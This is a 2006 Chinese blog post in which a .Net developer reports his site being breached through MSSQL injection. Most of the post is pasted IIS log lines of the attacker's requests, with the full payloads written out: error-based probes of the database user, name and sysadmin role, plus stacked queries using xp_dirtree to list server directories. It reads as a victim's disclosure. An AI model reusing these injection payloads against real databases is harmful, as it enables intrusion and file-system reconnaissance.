Net先驱者 : 昨天我的网站被人下载了！汗！

公告

.Net技术原创文章

存档

搜索

文件连接

昨天我的网站被人下载了！汗！

真没有想到我这里一个网站http://www.ucasp.net 竟然也被人整天稍描，没有想到的是一个原本放在暗处的连接被人找到了。通过mssql注入进去了。
部分注入语句拿出来共享：
2006-12-19 23:01:07 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''=' 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:07 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''=' 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:10 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20and%20char(124)%2Buser%2Bchar(124)=0 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:10 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20and%20char(124)%2Buser%2Bchar(124)=0 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:20 W3SVC1282302946 202.75.219.146 GET /special-687.aspx - 80 - 60.191.80.45 YodaoBot/1.0+(http://www.yodao.com/help/webmaster/spider/;+) 200 0 0
2006-12-19 23:01:21 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''=' 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:23 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20and%20char(124)%2Buser%2Bchar(124)=0 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:24 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20and%20char(124)%2Buser%2Bchar(124)=0;declare%20@d%20int;-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:24 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20%61%6E%64%20%31%3D%31 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2006-12-19 23:01:25 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20and%20char(124)%2Bdb_name()%2Bchar(124)=0%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:26 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20%61%6E%64%20%31%3D%32 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0
2006-12-19 23:01:26 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:28 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20%20and%20exists%20(select%20*%20from%20sysobjects)%20-- 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2006-12-19 23:01:35 W3SVC1282302946 202.75.219.146 GET /~rssfeed.aspx Action=Special&ID=2396 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 404 0 0
2006-12-19 23:01:36 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 200 0 0
2006-12-19 23:01:40 W3SVC1282302946 202.75.219.146 GET /special-629.aspx - 80 - 60.191.80.45 YodaoBot/1.0+(http://www.yodao.com/help/webmaster/spider/;+) 200 0 0
2006-12-19 23:01:41 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396~ 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+.NET+CLR+2.0.50727;+.NET+CLR+1.1.4322) 500 0 0
2006-12-19 23:01:43 W3SVC1282302946 202.75.219.146 GET /Song-64030.aspx - 80 - 60.191.80.45 YodaoBot/1.0+(http://www.yodao.com/help/webmaster/spider/;+) 200 0 0
2006-12-19 23:01:43 W3SVC1282302946 202.75.219.146 GET /special-122.aspx - 80 - 202.160.179.80 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 200 0 0
2006-12-19 23:01:52 W3SVC1282302946 202.75.219.146 GET /Song-72369.aspx - 80 - 60.191.80.45 YodaoBot/1.0+(http://www.yodao.com/help/webmaster/spider/;+) 200 0 0
2006-12-19 23:01:53 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396;DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"d:\",%201,1-- 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2006-12-19 23:01:53 W3SVC1282302946 202.75.219.146 GET /special-2290.aspx - 80 - 60.191.80.45 YodaoBot/1.0+(http://www.yodao.com/help/webmaster/spider/;+) 200 0 0
2006-12-19 23:01:53 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20D99_Tmp)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:55 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396;DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"d:\",%201,1-- 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2006-12-19 23:01:55 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20D99_Tmp)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396;DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"c:\",%201,1-- 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20D99_Tmp)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%203%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%204%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%205%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%206%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%207%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:01:59 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%208%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:00 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%209%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:00 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%2010%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:02 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396;DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"c:\Inetpub\",%201,1-- 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2006-12-19 23:02:02 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20D99_Tmp)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:02 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:02 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:02 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%203%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:05 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''=' 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:05 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20and%20char(124)%2Buser%2Bchar(124)=0 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:05 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20and%20char(124)%2Buser%2Bchar(124)=0;declare%20@d%20int;-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:05 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20and%20char(124)%2Bdb_name()%2Bchar(124)=0%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:05 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20%61%6E%64%20%31%3D%31 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2006-12-19 23:02:05 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:05 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20%61%6E%64%20%31%3D%32 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0
2006-12-19 23:02:05 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20%20and%20exists%20(select%20*%20from%20sysobjects)%20-- 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2006-12-19 23:02:07 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396;DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"c:\Inetpub\wwwroot\",%201,1-- 80 - 202.105.37.52 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2006-12-19 23:02:07 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20D99_Tmp)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:07 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:07 W3SVC1282302946 202.75.219.146 GET /rssfeed.aspx Action=Special&ID=2396%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20-- 80 - 202.105.37.52 Internet+Explorer+6.0 500 0 0
2006-12-19 23:02:07 W3SVC1282302946 202.75.219.146 GET /guest.asp - 80 - 219.136.13.211 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 404 0 2

发布于 posted on 2006年12月21日 11:13 由祥子

Net先驱者

订阅

公告

存档

搜索

文件连接

昨天我的网站被人下载了！汗！